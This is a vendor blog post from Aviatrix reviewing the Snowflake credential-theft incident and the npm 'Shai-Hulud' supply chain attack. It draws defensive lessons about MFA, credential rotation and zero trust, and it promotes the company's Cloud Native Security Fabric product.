TL;DR

  • The Snowflake data incident (2024) and the NPM "Shai-Hulud" supply chain attack (2025) both featured stolen credentials.

  • Organizations should implement zero trust security principles like visibility and security policy enforcement to protect their data.

Credentials: The Real Weak Link

Massive cyber incidents are sadly becoming routine. And while many compromises are traced back to a vulnerability or misconfiguration, the most damaging attacks today increasingly rely on valid accounts. In other words: attackers don’t need an advanced exploit when they can just steal your house keys and walk through the front door. 

This isn’t a niche problem or a rare headline. Stolen credentials are affecting millions of users and companies worldwide every single day. The tools to harvest them are cheap and easy to get, and the payoff is enormous. If your organization treats identity like an afterthought, you’re a target. 

  • The Snowflake data incident (2024) hinged on credentials stolen by infostealer malware. Because the accounts lacked MFA, attackers logged in as legitimate users and exfiltrated data at scale. 

  • The NPM “Shai-Hulud” supply chain attack (2025) compromised maintainer accounts via phishing. Once inside, attackers used those valid credentials to push malicious updates into hundreds of packages, spreading risk downstream fast. 

Neither case required elite hacking skills. Both worked because identity was the weak spot, and that’s the part too many teams ignore until it’s front-page news. With valid credentials in hand, attackers save time and dramatically reduce their chances of being detected. There are no malware signatures to trip alarms. They can just walk right in. 

What Happened in the Snowflake Incident

According to Mandiant, Snowflake’s customer environments were compromised when the UNC5537 group used malware-harvested credentials, including VIDAR, RISEPRO, REDLINE, RACOON STEALER, LUMMA, and METASTEALER, to log into accounts that didn’t require MFA. 

Because those accounts lacked MFA, attackers were able to log in as valid users, access sensitive datasets, and exfiltrate large volumes of customer information.  

Dark Reading published an article stating that some of the credentials identified in infostealer malware output had been for sale on the Dark Web for years and were still valid, meaning they had never been rotated or updated. It’s a reminder that we still struggle with basic security hygiene, and how a simple oversight like not rotating credentials can snowball into a full-blown incident. As many as 165 organizations were impacted, including Ticketmaster, Santander, and AT&T. 

What Happened in the NPM Supply Chain Attack

 In 2025, attackers targeted NPM maintainers with phishing, stealing valid publishing tokens. These were used to push malicious versions of widely used packages like debug and chalk. The malware: 

  • Planted post-install scripts to exfiltrate secrets. 

  • Leveraged worm-like propagation to infect other packages controlled by the same maintainer. 

  • Harvested tokens, GitHub credentials, and cloud provider keys for further compromise. 

In hours, over 500 packages were poisoned, and countless downstream projects were at risk. That meant not only developers but also end users and businesses depending on those packages were suddenly exposed. Applications could inherit malicious code, sensitive data could be siphoned off, and organizations faced the costly work of auditing, patching, and rebuilding trust. 

If you’ve ever had a dependency chain break your build, imagine that, but with malware spreading through your supply chain and a cleanup that disrupts teams, slows delivery, and damages confidence. Popular open-source projects saw downloads of these poisoned packages spike into the millions before removal, amplifying the risk to companies and users alike. 

Common Theme: Valid Accounts, Assumed Trust

Snowflake and NPM may look different, a data warehouse incident versus an open-source supply chain attack, but both underscore the same lesson: 

  • Attackers don’t need to break in if they can log in

  • Today’s perimeter isn’t a firewall, it’s identity

  • Zero trust is a strong philosophy, but unless it is operationalized everywhere, gaps remain. 

And here’s the bigger point: these aren’t one-off headline events. This kind of attack is happening every day, all over the world, because credential harvesting is cheap, easy, and effective. Once inside, attackers often move almost freely, sometimes because best practices weren’t followed, sometimes because complexity and visibility gaps made it impossible to catch them quickly. 

The NPM example also shows how much trust we place in third-party libraries. When that trust is broken, it can ripple straight into our environments. In this case, the worm-like malware wasn’t just spreading malicious code, it was stealing more credentials and fueling further compromises. 

Translation: passwords alone are an open door. 

Zero Trust Is a Start, Not an End

Zero Trust architecture (ZTA) shifts the mindset from implicit to explicit verification: least-privilege, continuous authentication, and monitoring. But implementing it across hybrid, multi-cloud, and SaaS ecosystems is complex. 

Without a unifying approach, zero trust can leave critical blind spots in places like cross-cloud connections and MACsec encryption, leaving gaps that attackers can (and will) exploit. That’s where Cloud Native Security Fabric comes in to provide a pervasive, holistic security solution that protects your entire network. And if you’ve been through enough incident post-mortems, you already know: complexity is the enemy, consistency is survival.  

Lessons Learned for Defenders

The Snowflake and NPM incidents show that organizations need stronger identity controls, consistent policies, and better visibility across environments: 

  • Strengthen authentication – MFA should be mandatory, and credentials should be rotated regularly. 

  • Enforce consistent policies across SaaS, CSP, and on-prem environments – Identity-first policies need to be applied uniformly, no matter where workloads and accounts reside. 

  • Improve visibility – Monitor for unusual behavior like bulk queries, odd API usage, or malicious package activity. 

  • Watch egress traffic – Catch data exfiltration attempts to attacker infrastructure. 

  • Invest in telemetry and intelligence – Map traffic, highlight anomalies, and make it actionable. 

  • Harden and segment workloads – Assume compromise and design your infrastructure to be resilient, prepared, and contained before it happens. 

The assumption is simple: credentials will be compromised. The lesson is to make sure those credentials can’t be abused undetected or unchecked. That means planning for compromise before it happens, so controls are already in place to contain the damage and limit attacker freedom once they are inside. 

How Cloud Native Security Fabric (CNSF) Helps

Aviatrix Cloud Native Security Fabric (CNSF) embeds zero trust principles in the fabric of your network, eliminating the blind spots and vulnerabilities that allow attacks like Snowflake and NPM to succeed: 

  • Authenticate and authorize based on workload identity – Move beyond static controls like IP addresses and ensure policies are tied to identity, enforcing least privilege across environments. 

  • Segment networks effectively – Only the workloads, users, and accounts that truly need to communicate should be able to do so. This reduces the blast radius when compromise occurs. 

  • Enforce consistent security policies – Use a central hub to apply uniform identity-first policies across SaaS, CSP, and on-prem environments. 

  • Provide east-west and cross-cloud visibility – Eliminate blind spots by examining internal and cross-cloud traffic, not just north-south flows. 

  • Offer visualization and telemetry – Map traffic patterns and deliver actionable intelligence to spot anomalies quickly. 

  • Filter egress traffic – Inspect traffic leaving the environment to disable data exfiltration attempts. 

Takeaway

The Snowflake and NPM incidents prove the same point: credentials and valid accounts are a setup, not the end of the story. Attackers will get in. The real question is what they can do once they’re inside. 

I’ve seen firsthand how damaging these attacks can be. Simple credential theft that looks like a minor issue on the surface can cascade into business disruption, regulatory headaches, and weeks of all-hands-on-deck response. Those scars stay with teams long after the headlines fade. 

Security leaders must: 

  • Assume valid account compromise is inevitable. 

  • Limit what attackers can do once they log in by enforcing least privilege everywhere. 

  • Build visibility and detection to spot misuse quickly. 

  • Treat zero trust as a foundation, not a finish line. 

  • Operationalize Cloud Native Security Fabric to shrink attacker freedom of movement and reduce the blast radius. 

Credentials will be stolen. Attackers will get in. The difference between a nuisance and a catastrophe is how little they can do once inside. And that depends on whether you planned for compromise before it happened. 

Learn how Aviatrix Cloud Native Security Fabric (CNSF) operationalizes the zero trust framework to provide comprehensive network protection.  

Schedule a demo to see how CNSF provides pervasive security.  

References

Cloud Security Alliance, “Unpacking the 2024 Snowflake Data Breach,” May 7, 2025, https://cloudsecurityalliance.org/blog/2025/05/07/unpacking-the-2024-snowflake-data-breach

CyberScoop, “As many as 165 companies ‘potentially exposed’ in Snowflake-related attacks, Mandiant says,” June 10, 2024, https://cyberscoop.com/as-many-as-165-companies-potentially-exposed-in-snowflake-related-attacks-mandiant-says/.   

Dark Reading, “Snowflake Account Attacks Driven by Exposed Legitimate Credentials,” July 17, 2024. https://www.darkreading.com/threat-intelligence/snowflake-account-attacks-driven-by-exposed-legitimate-credentials.  

Mandiant, “UNC5537 Targets Snowflake Customer Instances for Data Theft and Extortion,” June 10, 2024, https://cloud.google.com/blog/topics/threat-intelligence/unc5537-snowflake-data-theft-extortion

NPM GitHub Blog, “Our plan for a more secure npm supply chain,” September 22, 2025, https://github.blog/security/supply-chain-security/our-plan-for-a-more-secure-npm-supply-chain/ 

NPM CISA Advisory, “Widespread Supply Chain Compromise Impacting npm Ecosystem,” September 23, 2025, https://www.cisa.gov/news-events/alerts/2025/09/23/widespread-supply-chain-compromise-impacting-npm-ecosystem 

Snowflake, “Multi-factor authentication (MFA),” accessed September 19, 2025, https://web.archive.org/web/20240605134313/https://docs.snowflake.com/en/user-guide/security-mfa.   

resources_orange_glow
related posts
Scattered Spider’s Cybercrime Merger How the Scattered LAPSUS$ Hunters Brand Expands Reach card image

Scattered Spider’s Cybercrime Merger: How the Scattered LAPSUS$ Hunters Brand Expands Reach

From Compliance to Confidence The New Reality of DORA and NIS2 Enforcement card image

From Compliance to Confidence: DORA and NIS2 Enforcement

Rethinking Access How Aviatrix and AWS Are Simplifying Trust and Security card image

Rethinking Access: How Aviatrix and AWS Are Simplifying Trust and Security

Subscribe
Matt Snyder
Matt Snyder

Principal Engineer/Lead - Detection and Response, Aviatrix, Inc.

Matt leads lead Detection & Response efforts at Aviatrix, working closely with internal security teams and external partners to identify, investigate, and respond to potential threats. His role spans strategic oversight and hands-on execution to ensure a strong security posture across complex, distributed environments.

Featured Categories

orange-pattern-center

ACE Program

card image

Customers

card image

Cloud Network Security

card image

AWS

card image

Partners

card image

Cloud Networking Heroes

card image

Azure

card image

Events

card image
PODCAST

Altitude

View All
subscribe now

Keep Up With the Latest From Aviatrix

Cta pattren Image